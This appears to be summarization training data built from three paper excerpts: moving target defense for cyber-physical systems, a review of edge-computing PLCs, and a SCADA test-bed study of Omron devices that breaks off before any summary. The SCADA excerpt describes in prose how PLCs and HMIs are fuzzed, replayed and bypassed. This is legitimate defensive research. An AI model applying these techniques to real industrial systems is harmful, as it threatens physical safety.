Fig. 1. Evolution of the MTD switching signal that guarantees actuator proactive security. It can be seen that the controller with index 4 is preferred, since it is the most optimal.

Fig. 2. Evolution of the MTD state that guarantees actuator proactive security. With the appropriate dwell time, the system remains stable.

Fig. 1 shows the switching signal for the MTD framework applied to actuator attacks. It can be seen that the actuator with index 4 is the preferred one, due to its overall optimality compared to the rest of the actuator modes. Fig. 2 shows the convergence of the states under actuator MTD. Under the appropriate dwell time, the switched system remains asymptotically stable. In Fig. 3, we can see the evolution of the states under an attack signal for $t \in [15,20]$, where only the intrusion detection system was utilized. In Fig.
4, we see the evolution of the integral Bellman error. Although its magnitude is small, due to the absence of stochastic noise, the integral Bellman error is still able to detect the attack.

Fig. 3. Evolution of the states in the presence of actuator attacks. The attack takes place for t ∈ [15, 20].

Fig. 4. Evolution of the integral Bellman error. For the time interval where the attacker inputs an adversarial signal, t ∈ [15, 20], the integral Bellman error is nonzero, which is enough to achieve intrusion detection in the absence of stochastic noise.

In Fig. 5, we combine the reactive and the proactive security systems. The adversary manages to completely shut down one of the actuators belonging to the most optimal controller at t = 6 s. It is clear that the system is stabilized. In Fig. 6, we show the evolution of the random switching signal favoring the controller with the best performance. After an attack is detected, the compromised component is taken out of the switching queue. However, even without the compromised mode, the MTD structure still operates. This way, we maintain some level of unpredictability, while guaranteeing attack-free operation of the system. We note that the more compromised modes we have, the less unpredictable the system will be. However, once a mode has been taken out of the switching queue, offline methods may be utilized to repair it and reintroduce it to the MTD. In Fig. 7, we consider a system under actuator attacks in the presence of system noise. Specifically, the noise had a known upper bound ‖w‖ = 0.5, while the attack was a random signal with a maximum value of 0.3. We note from Fig. 8 that the intrusion

1040 IEEE TRANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020

Fig. 5. Evolution of the state with both proactive and reactive defense.
Even in the presence of attacks, the system converges to the origin, since the attacked components have been taken offline.

Fig. 6. Evolution of the switching signal with both proactive and reactive defense. It can be seen that when the adversarial signal is detected in the fourth controller, the random switching persists, but never chooses the compromised configuration.

Fig. 7. State evolution of a system with noise and actuator attacks. We note that the attack takes place at t ∈ [15, 20].

Fig. 8. Evolution of the integral Bellman error for the system under attack, as well as evolution of the adaptive threshold that takes into account the system noise. Despite the magnitude of the attack being smaller than the noise, the proposed algorithm is able to detect the intrusion.

Fig. 9. Optimal state estimation under noisy measurements and injected sensor attack. The attacker corrupts the output of the sensor for t ∈ [10, 20] by adding a constant bias.

detection signal is able to detect the injected signal despite the noise. Also, we consider the optimal state estimation problem for the ADMIRE aircraft utilizing the optimal observer framework. The state evolution of the observer is shown in Fig. 9. We notice that the attacker injects a relatively small bias into the estimated signal. For the sensor attacks, we take into account noise (with known statistics) on the measurements and show the evolution of the integral Bellman error and of the adaptive threshold in Fig. 10. Even though the discrepancy between the estimated angle of attack and the actual one is small relative to the measurement noise, the integral Bellman error manages to detect the attack. Specifically, during t ∈ [14, 16], we detect the difference between the estimated error (due to sensor noise) and the one induced by the attack.
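The reactive step described above, removing a detected mode from the random switching queue while keeping the remaining modes unpredictable, can be sketched as follows. This is a toy illustration with made-up mode indices and probabilities, not the paper's controller implementation.

```python
import random

class MTDSwitcher:
    """Toy sketch of random MTD mode selection with reactive removal.
    Mode indices and probabilities are illustrative, not the paper's."""

    def __init__(self, probs, seed=0):
        self.probs = dict(probs)      # mode index -> switching probability
        self.rng = random.Random(seed)

    def quarantine(self, mode):
        # Take a detected-compromised mode out of the switching queue and
        # renormalize the probabilities of the remaining safe modes.
        self.probs.pop(mode, None)
        total = sum(self.probs.values())
        self.probs = {m: p / total for m, p in self.probs.items()}

    def next_mode(self):
        # Randomly pick the next configuration among the safe modes only.
        modes, weights = zip(*sorted(self.probs.items()))
        return self.rng.choices(modes, weights=weights)[0]
```

As in the paper's Fig. 6, after quarantining a mode the switcher still randomizes over the remaining modes, so some unpredictability is preserved, and a repaired mode could later be re-inserted into the probability table.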
Although the advantages of the model-free integral Bellman error based intrusion detection mechanism can be seen when the system is under attack, due to its proactive nature the success or failure of an MTD system is not easily obvious. Furthermore, the optimality loss induced by the use of non-overall-optimal controllers must be examined. The optimality loss was assessed as the difference between the actual cost during the system run and the value function of the most optimal controller. To obtain some first validation results for our MTD algorithm, random attack vectors were considered for multiple runs of the system. In Fig. 11, we present the average cost of the system as the unpredictability increases. We can see that the cost converges to a maximum value for the uniform distribution over all the available controllers. In Fig. 12, the compromise between security against attacks and optimality is highlighted. Specifically, as we increase the weight on entropy, i.e., the parameter ε, the system switches more aggressively. This leads to a decrease in successful attacks, since the attack is less probable to affect a mode that is in use.

Fig. 10. Evolution of the integral Bellman error and adaptive threshold for successful state reconstruction in the presence of sensor attacks. Even taking into account the noise of the sensors, the attack is detected.

Fig. 11. Optimality loss (difference between the actual cost during the system run and the value function of the most optimal controller) induced by the unpredictable controllers for different entropy levels. By increasing the weight on the entropy, we reach a maximum optimality loss in the case of the uniform distribution.
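The tradeoff just described, where a larger entropy weight ε drives the switching distribution from the single best mode toward the uniform distribution, can be sketched with a Gibbs/softmax rule. This closed form is an illustrative stand-in for the paper's optimization (10), not its actual solution method.

```python
import math

def switching_probs(costs, eps):
    """Entropy-regularized switching probabilities, p_i proportional to
    exp(-V_i / eps). Small eps concentrates on the cheapest mode, while
    large eps drives the distribution toward uniform (illustrative
    stand-in for the paper's optimization in (10))."""
    if eps <= 0:
        raise ValueError("eps must be positive")
    # Subtract the minimum cost for numerical stability before exponentiating.
    lo = min(costs)
    weights = [math.exp(-(c - lo) / eps) for c in costs]
    total = sum(weights)
    return [w / total for w in weights]
```

With mode costs V = [1.0, 2.0, 3.0, 0.5], a tiny ε puts almost all probability on the cheapest mode, while a very large ε yields nearly 0.25 per mode, mirroring the convergence to maximum optimality loss at the uniform distribution shown in Fig. 11.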
However, as ε increases, the system utilizes the overall optimal controller less, until it reaches the uniform distribution over the different modes. Fig. 13 shows the integral Bellman error of the observer under actuator attacks. We note that even though the design processes of the secure optimal controller and the secure optimal observer are separate, attacks in one subsystem (in this case, in the controller) may induce integral Bellman error in the other one (in this scenario, in the observer). However, we are still able to identify a specific controller/observer pair that has been compromised and switch to a different one as described.

Fig. 12. Optimality loss and rate of successful attacks as a function of the entropy. Increasing the weight on unpredictability leads to performance degradation but manages to secure the system from attacks.

Fig. 13. Evolution of the integral Bellman error of the observer under actuator attacks. This signal is induced by the interconnection between the optimal control problems solved for control and estimation.

VI. CONCLUSION AND FUTURE WORK

This paper proposes a proactive and reactive defense switching mechanism against actuator and sensor attacks in CPS. The proactive defense is based on the framework of MTD and maximizes the unpredictability of the system. A novel intrusion detection mechanism, based on the performance evaluation, is used to isolate the attacked actuators and sensors. The system utilizing both reactive and proactive defenses is proven to have an asymptotically stable equilibrium point, provided the attacker did not compromise all the controllers and sensors simultaneously. Simulations on a linearized aircraft model are provided to show the efficiency of our approach.
Future research efforts will focus on incorporating learning mechanisms with attackers of different rationality, i.e., bounded reasoning. Furthermore, we will combine the proposed intrusion detection system with reinforcement learning techniques to develop a CPS framework which is able to learn optimal behaviors and defend against attackers without knowledge of the model. Moreover, we will investigate attacks that operate between different layers of the CPS, such as the communication and the computation layers. Finally, experiments will be conducted to investigate the practicality of our approach in real-life environments and under realistic attacks.
Summary:
This paper considers the problem of efficiently and securely controlling cyber-physical systems that are operating in uncertain and adversarial environments. To mitigate sensor and actuator attacks, as well as the performance loss due to such attacks, we formulate a secure control algorithm that consists of a proactive and a reactive defense mechanism. The proactive mechanism, which is based on the principles of moving target defense, utilizes a stochastic switching structure to dynamically and continuously alter the parameters of the system, hindering the attacker's ability to conduct successful reconnaissance on the system. The unpredictability of the current actuator and sensor is optimized using an information entropy measure, which is induced by probabilistic switching. The reactive mechanism, on the other hand, detects potentially attacked components, namely sensors and actuators, by leveraging online data to compute an integral Bellman error. A rigorous mathematical framework is presented to guarantee the stability of the equilibrium point of the closed-loop system and to provide a quantified bound on the performance loss when utilizing both reactive and proactive mechanisms. Simulation results show the efficacy of the proposed approaches on a benchmark aircraft model.
|
Summarize:
Keywords - Edge computing, PLCs, industry automation

I. INTRODUCTION

Industrial revolutions have changed the way of manufacturing and production of goods by utilizing disruptive new technologies. The first industrial revolution, starting in the late 18th century, introduced water and steam power that replaced human and animal labor [1]. One century later, the second revolution, characterized by new power sources (e.g. electric power) and the introduction of assembly lines, brought mass production to life. The third revolution began in the middle of the 20th century, with an emphasized use of digital technologies. Industrial computers, designed to operate in the industrial environment, as well as advanced telecommunications, were incorporated into factories, and all that led to the digital transformation of industry. During this revolution, the control of industrial processes shifted from robust relay logic systems to Programmable Logic Controllers (PLCs). With PLCs, a functional connection was established between digital/analog inputs and outputs [2], along with the development of flexible control algorithms. The ongoing transformation of industry, coined as the fourth industrial revolution or Industry 4.0, was introduced in 2011 to describe the vision of German industry driven by the Internet [3]. Industry 4.0 has the aim of increasing productivity, efficiency, safety, and transparency in the industry through a high level of integration between information and communication technologies and machines in cyber-physical systems (CPS) [4]. Different new revolutionizing technologies, such as the Industrial Internet of Things (IIoT), are enablers of the ongoing transformation [5], as shown in Fig. 1. In the paradigm of IIoT, a significant number of connected machines and objects generate a vast quantity of data. Another characteristic of industrial applications is the necessity of real-time analysis and decision-making, which makes them latency-sensitive applications.
The enormous quantity of data that needs to be transmitted and analyzed in a fast and secure environment may act as a challenge to a centralized cloud computing platform. To overcome the limitations of cloud computing and to satisfy the challenging conditions which arise in Industry 4.0, computing power is being brought closer to the data sources through Edge computing architecture, making Edge computing a part of the Industry 4.0 portfolio, as discussed in [6] and emphasized in [7]. Due to the increase in the performance of computers and processing, as well as the enhancement of storage capacities, Edge computing brings new opportunities to data manipulation [8]. PLCs are positioned at the very end of the industrial network, where their traditional role is evolving through the adoption of Edge computing principles [9]. This paper will provide a review of edge PLCs, i.e., the PLCs that are implementing Edge computing.

2022 21st International Symposium INFOTEH-JAHORINA (INFOTEH) | 978-1-6654-3778-3/22/$31.00 2022 IEEE | DOI: 10.1109/INFOTEH53737.2022.9751324

Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply.

Figure 3: ISA-95 standard reference architecture [20] (Level 4: ERP; Level 3: MES; Level 2: SCADA/HMI; Level 1: PLCs/PACs; Level 0: sensors/actuators)

This paper is structured as follows: Section 2 provides an overview of Edge computing. How industrial automation has changed with the implementation of the Edge computing paradigm is discussed in Section 3, which also provides an overview of one of the reference architectures that accommodate edge principles. Section 4 provides a comparison of three edge PLCs.

II.
EDGE COMPUTING

At first glance, Edge computing represents a new computing paradigm that acts as a successor of the Cloud era in the history of computer technology, but the first ideas of Edge computing can be traced back to the 1990s and content delivery networks [10]. Even though the ideas of edge were planted over 30 years ago, Cloud computing was predominant during that time. Cloud computing delivered a revolutionary approach to data processing that enabled high-end data manipulation originating from devices with modest processing capabilities. As mentioned in [11], 75% of enterprises will have adopted distributed processing without a data center or cloud by 2022, making Edge computing the main processing solution. Although edge is becoming predominant, there is still a strong connection between edge and cloud. Cloud is still suitable for non-real-time big data analysis, which is business-oriented, while Edge computing provides data analysis of local scope, which is usually real-time and control-oriented. A significant part of the computing, and even storage, is transferred from the cloud to the edge, making cloud servers less loaded [12]. Cloud still has an important role, as data continues to be transferred for further analysis and storage. Bringing computing closer to the physical layer of a network not only reduces latency and the usage of network resources, but also strengthens data security [12]. The main difference between Cloud and Edge computing is the server location: cloud services are located within the Internet, while services provided through Edge computing lie at the edge of the network [12].

Figure 2: Connection cloud-edge-devices (Image source: TechTarget)

Edge computing architecture can be presented in the form of a three-layer architecture [13], as shown in Fig 2, or in a four-layer representation of edge architecture where Internet gateways are independent entities [14].
The presented architecture describes a synergy between edge devices (devices that collect data), Edge computing nodes (edge nodes for short), and cloud servers. Functions of edge nodes depend on their possible location, including macro base stations, IoT gateways, 5G base stations, etc., as well as on their distance from the user [15]. Edge analytics, the process of gathering and analyzing data at the edge of the network, has a few major advantages [14]: reduced latency and storage costs, scalability, bandwidth reduction, increased cost-effectiveness, and privacy and security preservation. The application domain of Edge computing is wide: from virtual reality [15] and applications using 5G networks [16], to transportation [17] and smart grids [18]. Of 107 concrete use cases retrieved from comprehensive market analyses, available in [19], 10% belong to the industry domain. The impact of Edge computing on industrial automation is discussed next.

III. INDUSTRIAL AUTOMATION: TRADITIONAL CONCEPT AND EDGE COMPUTING CONCEPT

The International Society of Automation has developed the ISA-95 standard to describe the interface between control automation systems and enterprises. Pursuant to this standard, industrial automation systems follow a 5-level reference architecture, as shown in Fig 3 [20]. Automation control, a symbiosis of sensors/actuators and PLCs/PACs, is placed on Levels 0 and 1. SCADA (Supervisory Control And Data Acquisition), used for monitoring, is positioned on Level 2. Those levels require short response times and real-time analysis. MES (Manufacturing Execution Systems) on Level 3 and ERP (Enterprise Resource Planning) on Level 4 require information on a daily or weekly basis. A high volume of opportunities for research comes together
with the rising popularity of Edge computing.

Figure 4: CROSS values of Edge computing [22] (mass and heterogeneous connection, real-time services, data optimization, smart applications, security and privacy protection)

Figure 5: Reference architecture with three main tiers (field, edge, and cloud) [24]

The Edge Computing Consortium [21] has assessed that Edge computing services deliver important CROSS values to industry digitalization (Fig 4). Connectivity of heterogeneous networks, which are populated with a mass quantity of devices, is the main pillar of Edge computing. The rising quantity of devices, as well as the interoperability of long-existing industrial networks, label connectivity as one of the challenges of Edge computing. Industrial systems are latency-sensitive and require real-time analysis. Therefore, reducing latency and providing real-time services are some of the main contributions of Edge computing and one of the key research points, as elaborated in [22]. As a bridge between the physical and cyber world, the edge serves as the first entry point of a large amount of heterogeneous data, which leads to the high importance of data optimization. Edge intelligence is making smart applications more efficient and provides major cost advantages. Security on the edge of a network includes device security, network security, and data and application security, where end-to-end protection is critical. With Edge computing entering the industry, there is an arising need to develop reference architectures that accommodate edge principles in already existing industrial architecture.
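The "data optimization" value above is commonly realized by aggregating raw readings at the edge and forwarding only a compact summary upstream. The sketch below is a generic, hypothetical illustration of that pattern; the topic layout, field names, and statistics are assumptions, not part of any cited architecture or vendor API.

```python
import json
import statistics

def make_telemetry(device_id, topic_root, readings):
    """Aggregate raw readings at the edge and build a compact topic/payload
    pair for upstream publication. All names here are illustrative."""
    payload = {
        "device": device_id,
        "count": len(readings),
        "mean": statistics.fmean(readings),
        "min": min(readings),
        "max": max(readings),
    }
    topic = f"{topic_root}/{device_id}/telemetry"
    return topic, json.dumps(payload)
```

A real edge node would hand the resulting pair to a publish/subscribe client (for example an MQTT client), sending one small summary message instead of every raw sample, which is exactly the bandwidth reduction claimed for edge analytics.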
One of the reference architectures (RA) has been developed as a result of the H2020 FAR-EDGE project [23], using the concepts of tiers and scopes to describe the structure of a system. Scopes define the mapping of system elements to a factory (Plant scope) or the wider corporate IT (Enterprise ecosystem scope). The Plant scope covers Levels 0 to 4, while ERP is part of the Enterprise ecosystem scope. Tiers can be tied to scopes but are technically oriented classifications that divide a system into three main tiers, as shown in Fig 5, with one support tier which provides services to the other tiers. The bottom layer is the field tier, which consists of edge nodes and entities of the real world. Edge nodes, according to FAR-EDGE, are any devices that represent the bridge between the digital world on one side and the physical world on the other, with embedded intelligence (smart objects) or without it (connected devices). Second, and the core of the RA, is the edge tier, populated by edge gateways: computing devices more intelligent than edge nodes that host software executing edge processes, i.e., real-time analysis. The top layer of the discussed RA is the cloud tier, where cloud servers are deployed. The cloud servers host the business logic and have the widest scope of all the tiers. A cloud tier can be located on commercial clouds or on private clouds, i.e., corporate data centers, to minimize privacy risks. Besides the FAR-EDGE RA, the Edge Computing Consortium and the Industrial Internet Consortium proposed the RAs described in [21].

IV. EDGE PLCS: STATE-OF-THE-ART

In the FAR-EDGE reference architecture, PLCs are positioned in the field tier and labeled as edge nodes (smart objects). In the following section, state-of-the-art PLCs will be presented, some of which have outgrown the position of edge nodes and can be labeled as edge gateways.

A.
ControlEdge PLC

According to the manufacturer, Honeywell Process Systems, the ControlEdge PLC [25] is an advanced loop and logic controller characterized by a modular design. Designed to comply with control and data management needs, this PLC is focused on connectivity. CPU modules, based on the e300 32-bit RISC PowerPC architecture, handle fast digital scanning and analog scanning through a dual scan method that supports a wide range of function block algorithms. Open Ethernet communication provides peer-to-peer communications between controllers as well as access by HMI or SCADA software applications. The ControlEdge series offers a redundant PLC in which the CPUs communicate with up to 12 I/O modules over Ethernet or fiber optics. The operator interface provided by Honeywell, as well as third-party interfaces, can be used for user interface support.

B. GRV-EPIC-PR1 and GRV-EPIC-PR2

GRV-EPIC-PR1 and GRV-EPIC-PR2 are modular Edge computing PLCs that form the groov EPIC (Edge Programmable Industrial Controller) system [26]. (EPICs combine the PLC characteristics of a real-time machine with the strengths of personal-computer-based systems, creating Programmable Automation Controllers, or PACs.) According to the manufacturer, it offers reliable real-time control that can be designed by using flowchart programming through PAC Control, IEC 61131-3 compliant programs, and also by using the programming languages Python and C/C++ with access to the Linux OS. The collection, processing, exchange, and display of data at the very edge of the network are enabled via tools like Ignition Edge, Node-RED, and MQTT. The integral touchscreen is used for on-premises data visualization, which can also be done on an external HDMI monitor or via web and mobile applications.

C.
MELIPC MI5000

Mitsubishi Electric Corporation brought out an Edge computing solution for industrial automation processes, composed of the industrial computer MELIPC and software solutions. The leading hardware solution is the industrial computer MELIPC MI5000 [27], designed to meet the real-time demands of industrial applications alongside an Edge computing application. The MI5000 is able to perform device control and data collection due to the VxWorks operating system, which comes pre-installed. Besides the VxWorks operating system, the MI5000 can run Windows at the same time, which enables analysis and display of acquired data and powerful processing at the edge. The industrial computer is equipped with a CC-Link IE Field Network port and a CC-Link IE Field Network Basic port, making compatible products easy to connect. Installing additional software allows easy collection of data from third-party companies. Table I presents a parallel comparison of the mentioned PLCs based on their main characteristics.

TABLE I. COMPARISON OF EDGE PLCS

                         ControlEdge HC900         groov EPIC                MELIPC MI5000
                         Controller                GRV-IAC-24
Power supply             90-264 V AC, 47-63 Hz     110-240 V AC, 50-60 Hz    100-240 V AC, 47-63 Hz
Operating ambient temp.  0-60 C                    -20-70 C                  0-55 C
Vibration resistance     0-14 Hz: amplitude 2.5 mm N/D                       Compliant with JIS B 3502
                         (peak-to-peak);                                     and IEC 61131-2
                         14-250 Hz: acc. 1 g
Mounting                 DIN rail                  DIN rail                  DIN rail
Pollution degree         = 2                       N/D                       <= 2
Ability to add I/O       YES                       YES                       YES
CPU                      N/D                       Quad-core ARM             Intel Core i7-5700EQ 2.6 GHz
Operating system         N/D                       Linux                     Windows 10 IoT Enterprise
                                                                             2016 (64-bit)^1, VxWorks 7.0^2
Memory capacity          64 MB or 128 MB           2 GB RAM, 2 MB battery-   12 GB^1 + 45 GB^2 (45 GB^1),
                         (depending on CPU model)  backed RAM + 6 GB         1 GB^1 + 4 GB^2
                                                   user space
Programming language     IEC 61131-3 standard      Flowchart with PAC        Languages supporting Windows
                         languages                 Control or IEC 61131-3    OS + C/C++
                                                   standard languages,
                                                   Python, C/C++
^1 Windows 10 IoT Enterprise 2016 (64-bit). ^2 VxWorks 7.0.

Connectivity, previously mentioned as one of the main values of Edge computing, is compared separately in Table II.

TABLE II. CONNECTIVITY CAPABILITIES OF EDGE PLCS

                         ControlEdge HC900         groov EPIC                MELIPC MI5000
                         Controller                GRV-IAC-24
RS-232                   0                         4 selectable ports        1
RS-485                   2                         (RS-232/RS-485)           -
USB ports                0                         2 (2.0)                   2 (3.0) + 2 (2.0)
Additional ports         -                         HDMI                      DisplayPort, CC-Link IE
                                                                             Field Network^1
Ethernet                 10Base-T/100BASE-TX/      10Base-T/100BASE-TX/      10Base-T/100BASE-TX/
                         1000BASE-T                1000BASE-T                1000BASE-T
RJ-45 connectors         1 or 2 (dependent on      2                         1 + 1
                         CPU model)
^1 High-speed data collection from compatible devices.

Taking the FAR-EDGE architecture as a reference, together with the characteristics of these three PLCs, it is possible to assign each of them to one of the tiers and classify them accordingly. The ControlEdge represents modest edge PLC capabilities, its main strength being connectivity, and its functionalities match those of edge nodes. The groov EPIC controller acts as a modular PLC equipped with a built-in display which offers real-time applications but also acts as an edge gateway, locating it in the edge tier. The MELIPC MI5000 is an industrial computer performing Edge computing applications in real time which can easily be connected to a PLC to perform control applications. This industrial computer acts as an edge gateway, located in the edge tier. These PLCs enable the implementation of applications based on architectures and services for vast data analytics, such as: Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), predictive maintenance, and protocols for IoT/IIoT data collection. All the advantages of these PLCs can be utilized only with engineers possessing the appropriate knowledge [28],[29]. New edge PLCs are ready to bring additional value for customers over standard PLCs, which are used only for control tasks.

V.
CONCLUSION

The vast data quantity generated from heterogeneous devices in the industrial environment, which requires real-time decision making, represents a motivation for implementing a new paradigm, Edge computing, in industrial automation. This paradigm is being applied to PLCs and industrial computers, devices at the very edge of the network, three of which are presented in this paper. Edge PLCs, which are equipped with powerful capabilities, are bringing new computing power to the shop floor while maintaining real-time analysis. The devices act as a bridge between the physical on-premises tier, populated with sensors and actuators, and the higher tiers, which consist of supervisory and business-oriented applications. With new computing capabilities, the functionalities performed on edge PLCs are improved. Applications from higher levels of industrial networks can be delegated to the PLC, making the industrial network more reliable in case of communication failure.
Summary:
The ongoing industrial revolution, Industry 4.0, driven by a mesh of disruptive new technologies, promises a more effective and productive industrial environment. The challenges that have arisen as a side effect, such as the vast quantity of data that needs to be transmitted and processed safely in real time, require a new computing approach. One of the paradigms being used to overcome this problem is Edge computing, which, due to increases in processing performance and storage capacity, moves data processing closer to the data origin. This new approach is being applied to Programmable Logic Controllers (PLCs), the core of industrial automation since the 1960s. This paper offers a parallel comparison of state-of-the-art PLCs that are adopting Edge computing principles and their fit in an already complex industrial network.
|
Summarize:
Keywords - SCADA; industrial security; test-beds

I. INTRODUCTION

Supervisory Control and Data Acquisition (SCADA) systems consist of Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), and Remote Terminal Units (RTUs), among many other components [2]. In older systems, these components communicated using their own dedicated networks and used their own specially-developed protocols. Therefore, SCADA systems were assumed secure by isolation. However, the fast growth of SCADA systems [1], the use of off-the-shelf components, and the development of mixed protocols (e.g. Modbus/TCP, Omron, ISO-TSAP) forced SCADA systems to become more open and accessible online, and hence exposed to various cyber-attacks [3]. Many attacks on SCADA systems have been reported so far, such as the Maroochy water breach incident [4], whereby an attacker gained control over 150 sewage pumping stations for more than three months; the Ohio nuclear power plant incident [5], whereby the safety monitoring system was shut down by the Slammer worm; and more recently the Stuxnet worm [6], considered to be one of the most sophisticated computer worms of all time, affecting more than 100,000 hosts and severely hindering the Iranian nuclear program. Several organizations are collecting and archiving SCADA incident reports. In [2], the authors introduced the Industrial Security Incident Database, which provides a comprehensive search engine for SCADA incidents. In this database, SCADA incidents were categorized according to their severity, consequences, entry point, etc. Furthermore, two major observations were highlighted: 1) attacks are getting more frequent, and 2) attacks are becoming more external than internal in origin. All of the aforementioned incidents indicate how vulnerable SCADA systems are, and they emphasize the devastating consequences of such attacks on the environment and the safety of humans.
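Part of the exposure described above comes from the protocols themselves: Modbus/TCP, for instance, is a simple binary format with public framing and no authentication field. As an illustration (a minimal reader written for this discussion, not a tool from the paper), the sketch below parses the standard 7-byte MBAP header that prefixes every Modbus/TCP frame.

```python
import struct

def parse_mbap(frame):
    """Parse the 7-byte Modbus/TCP MBAP header plus the function code of
    the PDU that follows. Fields are big-endian per the Modbus/TCP
    specification; note there is no authentication field anywhere."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol identifier must be 0 for Modbus")
    return {
        "transaction_id": tid,
        "protocol_id": pid,
        "length": length,       # byte count of the unit id + PDU
        "unit_id": unit,
        "function_code": frame[7],
    }
```

For example, the request bytes 00 01 00 00 00 06 01 03 00 6B 00 03 decode to transaction 1, unit 1, function code 3 (read holding registers); nothing in the header identifies or authenticates the sender, which is why exposing such endpoints online is so dangerous.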
Therefore, a deep analysis of SCADA protocols and components must be performed in order to understand and address these vulnerabilities and hence prevent them from being further exploited by attackers. In this paper, we present a test-bed for SCADA systems using components from a major vendor (Omron), and we show how we tested the Factory Intelligent Network Services (FINS) protocol and detected how to bypass its security features. In addition, we assessed the immunity of the SCADA components against DoS and fragmentation attacks. The rest of this paper is organized as follows: Section II reviews the related work and lists state-of-the-art SCADA test-beds. Section III describes our test-bed and lists the components we tested. In Section IV, we list the attacks and how we conducted them. In Section V, we present our results, list the detected vulnerabilities, and analyze their consequences. Finally, Section VI concludes the paper and presents some solutions and future work.

II. RELATED WORK

In this section, we list the state-of-the-art SCADA test-beds and the associated findings. In [7], the authors tested SCADA systems for resilience to different attacks using a simple test-bed that consists of a vulnerability tester, a configurator, a traffic analyzer, and a target device. Many attacks were conducted, including Netwox attacks, Nessus attacks, fragmentation attacks, and HTTP attacks. The results showed a high level of success for the attacks. As a result, the authors recommended the use of a Defense-In-Depth approach. In [8], the authors proposed a simulation test-bed that can be used in order to uncover SCADA vulnerabilities. The authors divided the SCADA system into three layers:

The Field Bus layer: it consists of the RTUs, sensors, and actuators. This layer is responsible for collecting raw data and delivering them to the higher layers.

The Industrial Ethernet layer: it consists of Master Terminal Units (MTUs), PLCs, HMIs, and servers.
It is responsible for controlling the first layer and analyzing the data. The Business Management layer: it consists of enterprise services and business applications. This layer allows users to control the SCADA system through external networks.
978-1-4673-5307-6/13/$31.00 ©2013 IEEE. The 3rd International Conference on Communications and Information Technology (ICCIT-2013): Digital Information Management & Security, Beirut.
Furthermore, the authors performed several attacks based on an attack tree methodology and analyzed their severity on the SCADA networks. The authors of [9] proposed three test-beds to investigate SCADA systems. The first test-bed is the single simulation-based instantiation, where the authors proposed the use of a single simulation environment using Simulink/Stateflow from Mathworks to simulate the SCADA system. In the second approach, the authors proposed the federated simulation-based instantiation, where they used multiple simulation environments: Omnet++ to simulate the network components and DEVS to simulate the software modules. Finally, the last test-bed is the emulation- and implementation-based instantiation, where the authors used real off-the-shelf SCADA components. Furthermore, the authors performed multiple attacks in order to study their impact on SCADA systems, including DoS attacks, integrity attacks, and phishing attacks. In [10], the authors developed a test-bed and an Intrusion Detection System (IDS) that monitors two levels of attacks.
In the first level, the IDS detects TELNET intrusions from outside the local network and observes normal and abnormal behaviors concerning login attempts and command/response communications. Furthermore, it automatically creates Snort rules when possible in order to detect further intrusions. In the second level, the IDS detects abnormal behavior inside the local network by constantly monitoring the state of all the network components and the changes that occur. The authors proposed an efficient technique to detect unauthorized login attempts via TELNET and abnormal internal behavior. Vulnerabilities in industrial protocols were studied in [11], where the authors worked on detecting vulnerabilities in the command syntax. The authors used the BlackPeer software to study the effect of various syntax grammar errors in different functions of the industrial protocols. The study revealed a very high level of vulnerabilities and called for urgent solutions. In [12], the author exposed many vulnerabilities in the Profinet and ISO-TSAP protocols used by Siemens PLCs. The discovered vulnerabilities were alarming, starting with the fact that the ISO-TSAP protocol does not use encryption; thus, reading password hashes and other useful information from the TCP dump was relatively easy. Accordingly, the author was able to perform replay and man-in-the-middle (MITM) attacks using such information. Consequently, the author was able to reprogram the PLC, start/stop the CPU, bypass the authentication process, change the authentication password or remove it altogether, read/write the memory, and even get a shell command to run on the PLC by fuzzing it. Although Siemens reported that it has fixed most of the problems, the fuzzing attack is yet to be fixed. Moreover, many other manufacturers that use the same protocols have yet to fix many of these problems. In [13], the authors described two successfully performed attacks on a SCADA network.
In the first attack, the authors fuzzed the SCADA HMI (Cimplicity HMI V6.1) and crashed it after sending 2216 bytes that resulted in a heap buffer overflow. This attack has a great impact on the SCADA system, since the process has to be manually restarted in order to bring the system back to its normal behavior. Furthermore, the buffer overflow allowed the authors to execute arbitrary payloads on the HMI server, such as running a remote shell. In the second attack, the authors sniffed the data around the Historian, which allowed them to extract login usernames and passwords. Even though the passwords were obfuscated, the scheme was weak (a simple Base64 encoding). Extracting the usernames and passwords allowed the authors to take the attacks to the next level, where they created a backdoor on the Historian using specially crafted packets. Although many papers worked on detecting vulnerabilities in SCADA systems, no previous work had implemented a reproducible, comprehensive study exposing vulnerabilities in SCADA protocols and components against internal attacks. This is the main goal of this paper. III. TEST-BED AND COMPONENTS Our test-bed is built using a specific vendor, but can be easily extended to equipment from other vendors. Our test-bed consists of an Omron PLC CJ1M-CPU11-ETN, an Omron HMI NS5-SQ11-v2, a controller PC, and an attacker PC. As illustrated in Figure 1, all the test-bed components are connected via Ethernet using a hub. In addition, the PLC and HMI are also connected through an NT Link, which is a serial communication protocol developed by Omron. Figure 1. Test-bed and its components. The Omron PLC and HMI are the devices under test (DUT). The controller is a computer monitoring the performance of the DUT and has all the software needed to program and run the PLC and HMI. In order to describe the attacks performed on the Omron components, we first need to understand the security features of the FINS protocol.
This protocol has two security features associated with the PLC: read protection and write protection. Read protection prevents access to some tasks and features on the PLC unless a password is supplied, while write protection helps protect the PLC from executing unauthorized write commands by applying a filter on the received commands and executing only those arriving from specific nodes (e.g., node #4 on network #7). Figure 2 shows the security features of the FINS protocol regarding PLC security. Figure 2. PLC security features of the FINS protocol. Moreover, the HMI is equipped with two security features. First, there is the Screen Data Security Function, whereby the Omron software responsible for downloading/uploading screen features to the HMI requests a certain password in order to perform these functions. Second, there is the User Security Function, whereby a five-level password security module is used to perform user authentication and to hide/show critical features on the HMI screen according to the operator's access level. Figure 3 demonstrates the security features of the HMI. Figure 3. HMI security features. IV. ATTACKS We divide the attacks into two main parts: attacks on the PLC and attacks on the HMI. In turn, each part is divided into four sections: cryptographic attacks, replay attacks, fragmentation attacks, and Denial of Service (DoS) attacks.
